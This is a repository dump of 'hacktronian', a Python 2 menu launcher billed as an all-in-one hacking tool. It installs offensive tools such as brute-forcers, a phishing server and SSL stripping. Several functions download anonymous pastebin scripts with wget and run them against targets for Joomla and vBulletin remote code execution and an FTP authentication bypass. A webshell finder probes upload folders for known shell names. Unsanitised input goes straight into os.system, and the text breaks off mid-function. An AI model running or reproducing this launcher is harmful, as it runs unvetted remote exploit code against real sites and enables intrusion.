├── LICENSE
├── README.md
├── hacktronian.py
├── install.sh
├── logo.png
└── update.sh


/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2018 Mr. SAGE
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # hacktronian
2 | All in One Hacking Tool for Linux &amp; Android
3 | 


--------------------------------------------------------------------------------
/hacktronian.py:
--------------------------------------------------------------------------------
   1 | #!/usr/bin/env python2.7
   2 | #
   3 | #   _   _   ___  _____  _   _____________ _____ _   _ _____  ___   _   _ 
   4 | #  | | | | / _ \/  __ \| | / /_   _| ___ \  _  | \ | |_   _|/ _ \ | \ | |
   5 | #  | |_| |/ /_\ \ /  \/| |/ /  | | | |_/ / | | |  \| | | | / /_\ \|  \| |
   6 | #  |  _  ||  _  | |    |    \  | | |    /| | | | . ` | | | |  _  || . ` |
   7 | #  | | | || | | | \__/\| |\  \ | | | |\ \\ \_/ / |\  |_| |_| | | || |\  |
   8 | #  \_| |_/\_| |_/\____/\_| \_/ \_/ \_| \_|\___/\_| \_/\___/\_| |_/\_| \_/
   9 | #                                         ~ Tools For Hacking by Mr. SAGE
  10 | 
  11 | import sys
  12 | import argparse
  13 | import os
  14 | import time
  15 | import httplib
  16 | import subprocess
  17 | import re
  18 | import urllib2
  19 | import socket
  20 | import urllib
  21 | import sys
  22 | import json
  23 | import telnetlib
  24 | import glob
  25 | import random
  26 | import Queue
  27 | import threading
  28 | #import requests
  29 | import base64
  30 | from getpass import getpass
  31 | from commands import *
  32 | from sys import argv
  33 | from platform import system
  34 | from urlparse import urlparse
  35 | from xml.dom import minidom
  36 | from optparse import OptionParser
  37 | from time import sleep
  38 | ##########################
  39 | os.system('clear')
  40 | 
  41 | 
  42 | def menu():
  43 |     print ("""
  44 | MIT License
  45 | 
  46 | Copyright (c) 2018 HACKTRONIAN
  47 | 
  48 | Permission is hereby granted, free of charge, to any person obtaining a copy
  49 | of this software and associated documentation files (the "Software"), to deal
  50 | in the Software without restriction, including without limitation the rights
  51 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
  52 | copies of the Software, and to permit persons to whom the Software is
  53 | furnished to do so, subject to the following conditions:
  54 | 
  55 | The above copyright notice and this permission notice shall be included in all
  56 | copies or substantial portions of the Software.
  57 | 
  58 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
  59 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
  60 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
  61 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
  62 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
  63 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
  64 | SOFTWARE.""")
  65 | 
  66 | 
  67 | os.system('clear')
  68 | os.system('clear')
  69 | os.system('clear')
  70 | os.system('clear')
  71 | 
  72 | directories = ['/uploads/', '/upload/', '/files/', '/resume/', '/resumes/', '/documents/', '/docs/', '/pictures/', '/file/', '/Upload/', '/Uploads/', '/Resume/', '/Resume/', '/UsersFiles/', '/Usersiles/', '/usersFiles/', '/Users_Files/', '/UploadedFiles/',
  73 |                '/Uploaded_Files/', '/uploadedfiles/', '/uploadedFiles/', '/hpage/', '/admin/upload/', '/admin/uploads/', '/admin/resume/', '/admin/resumes/', '/admin/pictures/', '/pics/', '/photos/', '/Alumni_Photos/', '/alumni_photos/', '/AlumniPhotos/', '/users/']
  74 | shells = ['wso.php', 'shell.php', 'an.php', 'hacker.php', 'lol.php', 'up.php', 'cp.php', 'upload.php',
  75 |           'sh.php', 'pk.php', 'mad.php', 'x00x.php', 'worm.php', '1337worm.php', 'config.php', 'x.php', 'haha.php']
  76 | upload = []
  77 | yes = set(['yes', 'y', 'ye', 'Y'])
  78 | no = set(['no', 'n'])
  79 | 
  80 | 
  81 | def logo():
  82 |     print """
  83 |                            - Powered by
  84 |  ___  ___       _____  ___  _____  _____ 
  85 | |  \/  |      /  ___|/ _ \|  __ \|  ___|
  86 | | .  . |_ __  \ `--./ /_\ \ |  \/| |__  
  87 | | |\/| | '__|  `--. \  _  | | __ |  __| 
  88 | | |  | | |_   /\__/ / | | | |_\ \| |___ 
  89 | \_|  |_/_(_)  \____/\_| |_/\____/\____/ 
  90 | """
  91 | 
  92 | 
  93 | hacktronianlogo = """\033[0m                                   
  94 |   _     _         ______ _    _ _______ ______   _____  ______  _____        ______   
  95 |  | |   | |  /\   / _____) |  / |_______|_____ \ / ___ \|  ___ \(_____)  /\  |  ___ \  
  96 |  | |__ | | /  \ | /     | | / / _       _____) ) |   | | |   | |  _    /  \ | |   | | 
  97 |  |  __)| |/ /\ \| |     | |< < | |     (_____ (| |   | | |   | | | |  / /\ \| |   | | 
  98 |  | |   | | |__| | \_____| | \ \| |_____      | | |___| | |   | |_| |_| |__| | |   | | 
  99 |  |_|   |_|______|\______)_|  \_)\______)     |_|\_____/|_|   |_(_____)______|_|   |_| 
 100 |                                                       ~ Tools for Hacking by Mr. SAGE 
 101 | \033[91m"""
 102 | def menu():
 103 |     print (hacktronianlogo + """\033[1m
 104 |  [!] This Tool Must Run As ROOT [!] https://github.com/thehackingsage/hacktronian
 105 | \033[0m
 106 |    {1}--Information Gathering
 107 |    {2}--Password Attacks
 108 |    {3}--Wireless Testing
 109 |    {4}--Exploitation Tools
 110 |    {5}--Sniffing & Spoofing
 111 |    {6}--Web Hacking
 112 |    {7}--Private Web Hacking
 113 |    {8}--Post Exploitation
 114 |    {0}--Install The HACKTRONIAN
 115 |    {99}-Exit
 116 |  """)
 117 |     choice = raw_input("hacktronian~# ")
 118 |     os.system('clear')
 119 |     if choice == "1":
 120 |         info()
 121 |     elif choice == "2":
 122 |         passwd()
 123 |     elif choice == "3":
 124 |         wire()
 125 |     elif choice == "4":
 126 |         exp()
 127 |     elif choice == "5":
 128 |         snif()
 129 |     elif choice == "6":
 130 |         webhack()
 131 |     elif choice == "7":
 132 |         dzz()
 133 |     elif choice == "8":
 134 |         postexp()
 135 |     elif choice == "0":
 136 |         updatehacktronian()
 137 |     elif choice == "99":
 138 |         clearScr(), sys.exit()
 139 |     elif choice == "":
 140 |         menu()
 141 |     else:
 142 |         menu()
 143 | 
 144 | 
 145 | def updatehacktronian():
 146 |     print ("This Tool is Only Available for Linux and Similar Systems. ")
 147 |     choiceupdate = raw_input("Continue Y / N: ")
 148 |     if choiceupdate in yes:
 149 |         os.system("git clone https://github.com/thehackingsage/hacktronian.git")
 150 |         os.system("cd hacktronian && sudo bash ./update.sh")
 151 |         os.system("hacktronian")
 152 | 
 153 | 
 154 | def doork():
 155 |     print("doork is a open-source passive vulnerability auditor tool that automates the process of searching on Google information about specific website based on dorks. ")
 156 |     doorkchice = raw_input("Continue Y / N: ")
 157 |     if doorkchice in yes:
 158 |         os.system("pip install beautifulsoup4 && pip install requests")
 159 |         os.system("git clone https://github.com/AeonDave/doork")
 160 |         clearScr()
 161 |         doorkt = raw_input("Target : ")
 162 |         os.system("cd doork && python doork.py -t %s -o log.log" % doorkt)
 163 | 
 164 | 
 165 | def postexp():
 166 |     clearScr()
 167 |     print(hacktronianlogo)
 168 |     print("   {1}--Shell Checker")
 169 |     print("   {2}--POET")
 170 |     print("   {3}--Phishing Framework \n")
 171 |     print("   {99}-Return to main menu \n\n ")
 172 |     choice11 = raw_input("hacktronian~# ")
 173 |     os.system('clear')
 174 |     if choice11 == "1":
 175 |         sitechecker()
 176 |     if choice11 == "2":
 177 |         poet()
 178 |     if choice11 == "3":
 179 |         weeman()
 180 |     elif choice11 == "99":
 181 |         menu()
 182 | 
 183 | 
 184 | def scanusers():
 185 |     site = raw_input('Enter a website : ')
 186 |     try:
 187 |         users = site
 188 |         if 'http://www.' in users:
 189 |             users = users.replace('http://www.', '')
 190 |         if 'http://' in users:
 191 |             users = users.replace('http://', '')
 192 |         if '.' in users:
 193 |             users = users.replace('.', '')
 194 |         if '-' in users:
 195 |             users = users.replace('-', '')
 196 |         if '/' in users:
 197 |             users = users.replace('/', '')
 198 |         while len(users) > 2:
 199 |             print users
 200 |             resp = urllib2.urlopen(
 201 |                 site + '/cgi-sys/guestbook.cgi?user=%s' % users).read()
 202 | 
 203 |             if 'invalid username' not in resp.lower():
 204 |                 print "\tFound -> %s" % users
 205 |                 pass
 206 | 
 207 |             users = users[:-1]
 208 |     except:
 209 |         pass
 210 | 
 211 | 
 212 | def brutex():
 213 |     clearScr()
 214 |     print("Automatically brute force all services running on a target : Open ports / DNS domains / Usernames / Passwords ")
 215 |     os.system("git clone https://github.com/1N3/BruteX.git")
 216 |     clearScr()
 217 |     brutexchoice = raw_input("Select a Target : ")
 218 |     os.system("cd BruteX && chmod 777 brutex && ./brutex %s" % brutexchoice)
 219 | 
 220 | 
 221 | def arachni():
 222 |     print("Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications")
 223 |     cara = raw_input("Install And Run ? Y / N : ")
 224 |     clearScr()
 225 |     print("exemple : http://www.target.com/")
 226 |     tara = raw_input("Select a target to scan : ")
 227 |     if cara in yes:        
 228 |         os.system("git clone git://github.com/Arachni/arachni.git")
 229 |         os.system(
 230 |             "cd arachni && sudo gem install bundler && bundle install --without prof && rake install")
 231 |         os.system("archani")
 232 |     clearScr()
 233 |     os.system("cd arachni/bin && chmod 777 arachni && ./arachni %s" % tara)
 234 | 
 235 | 
 236 | def XSStrike():
 237 |     clearScr()
 238 |     print("XSStrike is a python script designed to detect and exploit XSS vulnerabilites. Follow The Owner On Github @UltimateHackers")
 239 |     os.system("sudo rm -rf XSStrike")
 240 |     os.system("git clone https://github.com/UltimateHackers/XSStrike.git && cd XSStrike && pip install -r requirements.txt && clear && python xsstrike")
 241 | 
 242 | 
 243 | def crips():
 244 |     clearScr()
 245 |     os.system("git clone https://github.com/Manisso/Crips.git")
 246 |     os.system("cd Crips && sudo bash ./update.sh")
 247 |     os.system("crips")
 248 |     os.system("clear")
 249 | 
 250 | 
 251 | def weeman():
 252 |     print("HTTP server for phishing in python. (and framework) Usually you will want to run Weeman with DNS spoof attack. (see dsniff, ettercap).")
 253 |     choicewee = raw_input("Install Weeman ? Y / N : ")
 254 |     if choicewee in yes:
 255 |         os.system(
 256 |             "git clone https://github.com/samyoyo/weeman.git && cd weeman && python weeman.py")
 257 |     if choicewee in no:
 258 |         menu()
 259 |     else:
 260 |         menu()
 261 | 
 262 | 
 263 | def gabriel():
 264 |     print("Abusing authentication bypass of Open&Compact (Gabriel's)")
 265 |     os.system("wget http://pastebin.com/raw/Szg20yUh --output-document=gabriel.py")
 266 |     clearScr()
 267 |     os.system("python gabriel.py")
 268 |     ftpbypass = raw_input("Enter Target IP and Use Command :")
 269 |     os.system("python gabriel.py %s" % ftpbypass)
 270 | 
 271 | 
 272 | def sitechecker():
 273 |     os.system("wget http://pastebin.com/raw/Y0cqkjrj --output-document=ch01.py")
 274 |     clearScr()
 275 |     os.system("python ch01.py")
 276 | 
 277 | 
 278 | def h2ip():
 279 |     host = raw_input("Select A Host : ")
 280 |     ips = socket.gethostbyname(host)
 281 |     print(ips)
 282 | 
 283 | 
 284 | def ports():
 285 |     clearScr()
 286 |     target = raw_input('Select a Target IP : ')
 287 |     os.system("nmap -O -Pn %s" % target)
 288 |     sys.exit()
 289 | 
 290 | 
 291 | def ifinurl():
 292 |     print""" This Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found."""
 293 |     print('Do You Want To Install InurlBR ? ')
 294 |     cinurl = raw_input("Y/N: ")
 295 |     if cinurl in yes:
 296 |         inurl()
 297 |     if cinurl in no:
 298 |         menu()
 299 |     elif cinurl == "":
 300 |         menu()
 301 |     else:
 302 |         menu()
 303 | 
 304 | 
 305 | def bsqlbf():
 306 |     clearScr()
 307 |     print("This tool will only work on blind sql injection")
 308 |     cbsq = raw_input("select target : ")
 309 |     os.system("wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/bsqlbf-v2/bsqlbf-v2-7.pl -o bsqlbf.pl")
 310 |     os.system("perl bsqlbf.pl -url %s" % cbsq)
 311 |     os.system("rm bsqlbf.pl")
 312 | 
 313 | 
 314 | def atscan():
 315 |     print ("Do You To Install ATSCAN ?")
 316 |     choiceshell = raw_input("Y/N: ")
 317 |     if choiceshell in yes:
 318 |         os.system("sudo rm -rf ATSCAN")
 319 |         os.system(
 320 |             "git clone https://github.com/AlisamTechnology/ATSCAN.git && cd ATSCAN && perl atscan.pl")
 321 |     elif choiceshell in no:
 322 |         os.system('clear')
 323 |         menu()
 324 | 
 325 | 
 326 | def commix():
 327 |     print ("Automated All-in-One OS Command Injection and Exploitation Tool.")
 328 |     print ("usage : python commix.py --help")
 329 |     choicecmx = raw_input("Continue: y/n :")
 330 |     if choicecmx in yes:
 331 |         os.system("git clone https://github.com/stasinopoulos/commix.git commix")
 332 |         os.system("cd commix")
 333 |         os.system("python commix.py")
 334 |         os.system("")
 335 |     elif choicecmx in no:
 336 |         os.system('clear')
 337 |         info()
 338 | 
 339 | 
 340 | def pixiewps():
 341 |     print"""Pixiewps is a tool written in C used to bruteforce offline the WPS pin exploiting the low or non-existing entropy of some Access Points, the so-called "pixie dust attack" discovered by Dominique Bongard in summer 2014. It is meant for educational purposes only
 342 |     """
 343 |     choicewps = raw_input("Continue ? Y/N : ")
 344 |     if choicewps in yes:
 345 |         os.system("git clone https://github.com/wiire/pixiewps.git")
 346 |         os.system("cd pixiewps & make ")
 347 |         os.system("sudo make install")
 348 |     if choicewps in no:
 349 |         menu()
 350 |     elif choicewps == "":
 351 |         menu()
 352 |     else:
 353 |         menu()
 354 | 
 355 | 
 356 | def webhack():
 357 |     print(hacktronianlogo)
 358 |     print("   {1}--Drupal Hacking ")
 359 |     print("   {2}--Inurlbr")
 360 |     print("   {3}--Wordpress & Joomla Scanner")
 361 |     print("   {4}--Gravity Form Scanner")
 362 |     print("   {5}--File Upload Checker")
 363 |     print("   {6}--Wordpress Exploit Scanner")
 364 |     print("   {7}--Wordpress Plugins Scanner")
 365 |     print("   {8}--Shell and Directory Finder")
 366 |     print("   {9}--Joomla! 1.5 - 3.4.5 remote code execution")
 367 |     print("   {10}-Vbulletin 5.X remote code execution")
 368 |     print(
 369 |         "   {11}-BruteX - Automatically brute force all services running on a target")
 370 |     print("   {12}-Arachni - Web Application Security Scanner Framework \n ")
 371 |     print("   {99}-Back To Main Menu \n")
 372 |     choiceweb = raw_input("hacktronian~# ")
 373 |     if choiceweb == "1":
 374 |         clearScr()
 375 |         maine()
 376 |     if choiceweb == "2":
 377 |         clearScr()
 378 |         ifinurl()
 379 |     if choiceweb == '3':
 380 |         clearScr()
 381 |         wppjmla()
 382 |     if choiceweb == "4":
 383 |         clearScr()
 384 |         gravity()
 385 |     if choiceweb == "5":
 386 |         clearScr()
 387 |         sqlscan()
 388 |     if choiceweb == "6":
 389 |         clearScr()
 390 |         wpminiscanner()
 391 |     if choiceweb == "7":
 392 |         clearScr()
 393 |         wppluginscan()
 394 |     if choiceweb == "8":
 395 |         clearScr()
 396 |         shelltarget()
 397 |     if choiceweb == "9":
 398 |         clearScr()
 399 |         joomlarce()
 400 |     if choiceweb == "10":
 401 |         clearScr()
 402 |         vbulletinrce()
 403 |     if choiceweb == "11":
 404 |         clearScr()
 405 |         brutex()
 406 |     if choiceweb == "12":
 407 |         clearScr()
 408 |         arachni()
 409 |     elif choiceweb == "99":
 410 |         menu()
 411 |     elif choiceweb == "":
 412 |         menu()
 413 |     else:
 414 |         menu()
 415 | 
 416 | 
 417 | def vbulletinrce():
 418 |     os.system("wget http://pastebin.com/raw/eRSkgnZk --output-document=tmp.pl")
 419 |     os.system("perl tmp.pl")
 420 | 
 421 | 
 422 | def joomlarce():
 423 |     os.system("wget http://pastebin.com/raw/EX7Gcbxk --output-document=temp.py")
 424 |     clearScr()
 425 |     print("if the response is 200 , you will find your shell in Joomla_3.5_Shell.txt")
 426 |     jmtarget = raw_input("Select a targets list :")
 427 |     os.system("python temp.py %s" % jmtarget)
 428 | 
 429 | 
 430 | def inurl():
 431 |     dork = raw_input("select a Dork:")
 432 |     output = raw_input("select a file to save :")
 433 |     os.system(
 434 |         "./inurlbr.php --dork '{0}' -s {1}.txt -q 1,6 -t 1".format(dork, output))
 435 |     if cinurl in no:
 436 |         insinurl()
 437 |     elif cinurl == "":
 438 |         menu()
 439 |     else:
 440 |         menu()
 441 | 
 442 | 
 443 | def insinurl():
 444 |     os.system("git clone https://github.com/googleinurl/SCANNER-INURLBR.git")
 445 |     os.system("chmod +x SCANNER-INURLBR/inurlbr.php")
 446 |     os.system("apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl")
 447 |     os.system("mv /SCANNER-INURLBR/inurbr.php inurlbr.php")
 448 |     clearScr()
 449 |     inurl()
 450 | 
 451 | 
 452 | def nmap():
 453 | 
 454 |     choice7 = raw_input("continue ? Y / N : ")
 455 |     if choice7 in yes:
 456 |         os.system("git clone https://github.com/nmap/nmap.git")
 457 |         os.system("cd nmap && ./configure && make && make install")
 458 |     elif choice7 in no:
 459 |         info()
 460 |     elif choice7 == "":
 461 |         menu()
 462 |     else:
 463 |         menu()
 464 | 
 465 | 
 466 | def jboss():
 467 |     os.system('clear')
 468 |     print ("This JBoss script deploys a JSP shell on the target JBoss AS server. Once")
 469 |     print ("deployed, the script uses its upload and command execution capability to")
 470 |     print ("provide an interactive session.")
 471 |     print ("")
 472 |     print ("usage : ./e.sh target_ip tcp_port ")
 473 |     print("Continue: y/n")
 474 |     choice9 = raw_input("yes / no :")
 475 |     if choice9 in yes:
 476 |         os.system(
 477 |             "git clone https://github.com/SpiderLabs/jboss-autopwn.git"), sys.exit()
 478 |     elif choice9 in no:
 479 |         os.system('clear')
 480 |         exp()
 481 |     elif choice9 == "":
 482 |         menu()
 483 |     else:
 484 |         menu()
 485 | 
 486 | 
 487 | def wppluginscan():
 488 |     Notfound = [404, 401, 400, 403, 406, 301]
 489 |     sitesfile = raw_input("sites file : ")
 490 |     filepath = raw_input("Plugins File : ")
 491 | 
 492 |     def scan(site, dir):
 493 |         global resp
 494 |         try:
 495 |             conn = httplib.HTTPConnection(site)
 496 |             conn.request('HEAD', "/wp-content/plugins/" + dir)
 497 |             resp = conn.getresponse().status
 498 |         except(), message:
 499 |             print "Cant Connect :", message
 500 |             pass
 501 | 
 502 |     def timer():
 503 |         now = time.localtime(time.time())
 504 |         return time.asctime(now)
 505 | 
 506 |     def main():
 507 |         sites = open(sitesfile).readlines()
 508 |         plugins = open(filepath).readlines()
 509 |         for site in sites:
 510 |             site = site.rstrip()
 511 |         for plugin in plugins:
 512 |             plugin = plugin.rstrip()
 513 |             scan(site, plugin)
 514 |             if resp not in Notfound:
 515 |                 print "+----------------------------------------+"
 516 |                 print "| current site :" + site
 517 |                 print "| Found Plugin : " + plugin
 518 |                 print "| Result:", resp
 519 | 
 520 | 
 521 | def sqlmap():
 522 |     print ("usage : python sqlmap.py -h")
 523 |     choice8 = raw_input("Continue: y/n :")
 524 |     if choice8 in yes:
 525 |         os.system(
 526 |             "git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev & ")
 527 |     elif choice8 in no:
 528 |         os.system('clear')
 529 |         info()
 530 |     elif choice8 == "":
 531 |         menu()
 532 |     else:
 533 |         menu()
 534 | 
 535 | 
 536 | def grabuploadedlink(url):
 537 |     try:
 538 |         for dir in directories:
 539 |             currentcode = urllib.urlopen(url + dir).getcode()
 540 |             if currentcode == 200 or currentcode == 403:
 541 |                 print "-------------------------"
 542 |                 print "  [ + ] Found Directory :  " + str(url + dir) + " [ + ]"
 543 |                 print "-------------------------"
 544 |                 upload.append(url + dir)
 545 |     except:
 546 |         pass
 547 | 
 548 | 
 549 | def grabshell(url):
 550 |     try:
 551 |         for upl in upload:
 552 |             for shell in shells:
 553 |                 currentcode = urllib.urlopen(upl + shell).getcode()
 554 |                 if currentcode == 200:
 555 |                     print "-------------------------"
 556 |                     print "  [ ! ] Found Shell :  " + str(upl + shell) + " [ ! ]"
 557 |                     print "-------------------------"
 558 |     except:
 559 |         pass
 560 | 
 561 | 
 562 | def shelltarget():
 563 |     print("exemple : http://target.com")
 564 |     line = raw_input("target : ")
 565 |     line = line.rstrip()
 566 |     grabuploadedlink(line)
 567 |     grabshell(line)
 568 | 
 569 | 
 570 | def poet():
 571 |     print("POET is a simple POst-Exploitation Tool.")
 572 |     print("")
 573 |     choicepoet = raw_input("y / n :")
 574 |     if choicepoet in yes:
 575 |         os.system("git clone https://github.com/mossberg/poet.git")
 576 |         os.system("python poet/server.py")
 577 |     if choicepoet in no:
 578 |         clearScr()
 579 |         postexp()
 580 |     elif choicepoet == "":
 581 |         menu()
 582 |     else:
 583 |         menu()
 584 | 
 585 | 
 586 | def setoolkit():
 587 |     print ("The Social-Engineer Toolkit is an open-source penetration testing framework")
 588 |     print(") designed for social engineering. SET has a number of custom attack vectors that ")
 589 |     print(" allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC  ")
 590 |     print("an information security consulting firm located in Cleveland, Ohio.")
 591 |     print("")
 592 | 
 593 |     choiceset = raw_input("y / n :")
 594 |     if choiceset in yes:
 595 |         os.system(
 596 |             "git clone https://github.com/trustedsec/social-engineer-toolkit.git")
 597 |         os.system("python social-engineer-toolkit/setup.py")
 598 |     if choiceset in no:
 599 |         clearScr()
 600 |         info()
 601 |     elif choiceset == "":
 602 |         menu()
 603 |     else:
 604 |         menu()
 605 | 
 606 | 
 607 | def cupp():
 608 |     print("cupp is a password list generator ")
 609 |     print("Usage: python cupp.py -h")
 610 |     choicecupp = raw_input("Continue: y/n : ")
 611 | 
 612 |     if choicecupp in yes:
 613 |         os.system("git clone https://github.com/Mebus/cupp.git")
 614 |         print("file downloaded successfully")
 615 |     elif choicecupp in no:
 616 |         clearScr()
 617 |         passwd()
 618 |     elif choicecupp == "":
 619 |         menu()
 620 |     else:
 621 |         menu()
 622 | 
 623 | 
 624 | def ncrack():
 625 |     print("A Ruby interface to Ncrack, Network authentication cracking tool.")
 626 |     print("requires : nmap >= 0.3ALPHA / rprogram ~> 0.3")
 627 |     print("Continue: y/n")
 628 |     choicencrack = raw_input("y / n :")
 629 |     if choicencrack in yes:
 630 |         os.system("git clone https://github.com/sophsec/ruby-ncrack.git")
 631 |         os.system("cd ruby-ncrack")
 632 |         os.system("install ruby-ncrack")
 633 |     elif choicencrack in no:
 634 |         clearScr()
 635 |         passwd()
 636 |     elif choicencrack == "":
 637 |         menu()
 638 |     else:
 639 |         menu()
 640 | 
 641 | 
 642 | def reaver():
 643 |     print """
 644 |       Reaver has been designed to be a robust and practical attack against Wi-Fi Protected Setup
 645 |       WPS registrar PINs in order to recover WPA/WPA2 passphrases. It has been tested against a
 646 |       wide variety of access points and WPS implementations
 647 |       1 to accept / 0 to decline
 648 |         """
 649 |     creaver = raw_input("y / n :")
 650 |     if creaver in yes:
 651 |         os.system(
 652 |             "apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps")
 653 |         os.system("git clone https://github.com/t6x/reaver-wps-fork-t6x.git")
 654 |         os.system("cd reaver-wps-fork-t6x/src/ & ./configure")
 655 |         os.system("cd reaver-wps-fork-t6x/src/ & make")
 656 |     elif creaver in no:
 657 |         clearScr()
 658 |         wire()
 659 |     elif creaver == "":
 660 |         menu()
 661 |     else:
 662 |         menu()
 663 | 
 664 | 
 665 | def ssls():
 666 |     print"""sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping
 667 |     attacks.
 668 |     It requires Python 2.5 or newer, along with the 'twisted' python module."""
 669 |     cssl = raw_input("y / n :")
 670 |     if cssl in yes:
 671 |         os.system("git clone https://github.com/moxie0/sslstrip.git")
 672 |         os.system("sudo apt-get install python-twisted-web")
 673 |         os.system("python sslstrip/setup.py")
 674 |     if cssl in no:
 675 |         snif()
 676 |     elif cssl == "":
 677 |         menu()
 678 |     else:
 679 |         menu()
 680 | 
 681 | 
 682 | def unique(seq):
 683 |     seen = set()
 684 |     return [seen.add(x) or x for x in seq if x not in seen]
 685 | 
 686 | 
 687 | def bing_all_grabber(s):
 688 | 
 689 |     lista = []
 690 |     page = 1
 691 |     while page <= 101:
 692 |         try:
 693 |             bing = "http://www.bing.com/search?q=ip%3A" + \
 694 |                 s + "+&count=50&first=" + str(page)
 695 |             openbing = urllib2.urlopen(bing)
 696 |             readbing = openbing.read()
 697 |             findwebs = re.findall('<h2><a href="(.*?)"', readbing)
 698 |             for i in range(len(findwebs)):
 699 |                 allnoclean = findwebs[i]
 700 |                 findall1 = re.findall('http://(.*?)/', allnoclean)
 701 |                 for idx, item in enumerate(findall1):
 702 |                     if 'www' not in item:
 703 |                         findall1[idx] = 'http://www.' + item + '/'
 704 |                     else:
 705 |                         findall1[idx] = 'http://' + item + '/'
 706 |                 lista.extend(findall1)
 707 | 
 708 |             page += 50
 709 |         except urllib2.URLError:
 710 |             pass
 711 | 
 712 |     final = unique(lista)
 713 |     return final
 714 | 
 715 | 
 716 | def check_gravityforms(sites):
 717 |     import urllib
 718 |     gravityforms = []
 719 |     for site in sites:
 720 |         try:
 721 |             if urllib.urlopen(site + 'wp-content/plugins/gravityforms/gravityforms.php').getcode() == 403:
 722 |                 gravityforms.append(site)
 723 |         except:
 724 |             pass
 725 | 
 726 |     return gravityforms
 727 | 
 728 | 
 729 | def gravity():
 730 |     ip = raw_input('Enter IP : ')
 731 |     sites = bing_all_grabber(str(ip))
 732 |     gravityforms = check_gravityforms(sites)
 733 |     for ss in gravityforms:
 734 |         print ss
 735 | 
 736 |     print '\n'
 737 |     print '[*] Found, ', len(gravityforms), ' gravityforms.'
 738 | 
 739 | 
 740 | def shellnoob():
 741 |     print """Writing shellcodes has always been super fun, but some parts are extremely boring and error prone. Focus only on the fun part, and use ShellNoob!"""
 742 |     cshell = raw_input("Y / N : ")
 743 |     if cshell in yes:
 744 |         os.system("git clone https://github.com/reyammer/shellnoob.git")
 745 |         os.system("mv shellnoob/shellnoob.py shellnoob.py")
 746 |         os.system("sudo python shellnoob.py --install")
 747 |     if cshell in no:
 748 |         exp()
 749 |     elif cshell == "":
 750 |         menu()
 751 |     else:
 752 |         menu()
 753 | 
 754 | 
 755 | def info():
 756 |     print(hacktronianlogo)
 757 |     print("  {1}--Nmap ")
 758 |     print("  {2}--Setoolkit")
 759 |     print("  {3}--Port Scanning")
 760 |     print("  {4}--Host To IP")
 761 |     print("  {5}--wordpress user")
 762 |     print("  {6}--CMS scanner")
 763 |     print("  {7}--XSStrike")
 764 |     print("  {8}--Dork - Google Dorks Passive Vulnerability Auditor ")
 765 |     print("  {9}--Scan A server's Users  ")
 766 |     print("  {10}-Crips\n  ")
 767 |     print("  {99}-Back To Main Menu \n\n")
 768 |     choice2 = raw_input("hacktronian~# ")
 769 |     if choice2 == "1":
 770 |         os.system('clear')
 771 |         nmap()
 772 |     if choice2 == "2":
 773 |         clearScr()
 774 |         setoolkit()
 775 |     if choice2 == "3":
 776 |         clearScr()
 777 |         ports()
 778 |     if choice2 == "4":
 779 |         clearScr()
 780 |         h2ip()
 781 |     if choice2 == "5":
 782 |         clearScr()
 783 |         wpue()
 784 |     if choice2 == "6":
 785 |         clearScr()
 786 |         cmsscan()
 787 |     if choice2 == "7":
 788 |         clearScr()
 789 |         XSStrike()
 790 |     if choice2 == "8":
 791 |         clearScr()
 792 |         doork()
 793 |     if choice2 == "10":
 794 |         clearScr()
 795 |         crips()
 796 |     elif choice2 == "99":
 797 |         clearScr()
 798 |         menu()
 799 |     if choice2 == "9":
 800 |         clearScr()
 801 |         scanusers()
 802 |     elif choice2 == "":
 803 |         menu()
 804 |     else:
 805 |         menu()
 806 | 
 807 | 
 808 | def cmsscan():
 809 |     os.system("git clone https://github.com/Dionach/CMSmap.git")
 810 |     clearScr()
 811 |     xz = raw_input("select target : ")
 812 |     os.system("cd CMSmap @@ sudo cmsmap.py %s" % xz)
 813 | 
 814 | 
 815 | def wpue():
 816 |     os.system("git clone https://github.com/wpscanteam/wpscan.git")
 817 |     clearScr()
 818 |     xe = raw_input("Select a Wordpress target : ")
 819 |     os.system("cd wpscan && sudo ruby wpscan.rb --url %s --enumerate u" % xe)
 820 | 
 821 | 
 822 | def priv8():
 823 |     dzz()
 824 | 
 825 | 
 826 | def androidhash():
 827 |     key = raw_input("Enter the android hash : ")
